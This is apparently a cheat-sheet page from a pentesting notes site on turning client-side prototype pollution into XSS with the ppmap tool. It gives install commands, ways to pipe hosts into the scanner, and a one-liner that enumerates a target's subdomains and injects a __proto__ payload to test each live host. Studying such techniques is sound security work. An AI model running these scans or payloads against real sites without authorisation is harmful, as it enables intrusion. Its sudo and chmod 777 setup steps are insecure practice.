PrototypePollution to XSS

ppmap, a scanner/exploitation tool written in GO, which leverages client-side Prototype Pollution to XSS by exploiting known gadgets

sudo git clone https://github.com/kleiton0x00/ppmap.git
cd ppmap
sudo chmod 777 setup.sh
sudo bash setup.sh

cat hosts.txt | cariddi | ppmap

echo https://target.com | ppmap

#one-liner
subfinder -d target.com -all -silent | httpx -silent -threads 300 | anew -q alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

PreviousDalfox Nextone-liners

Last updated 1 year ago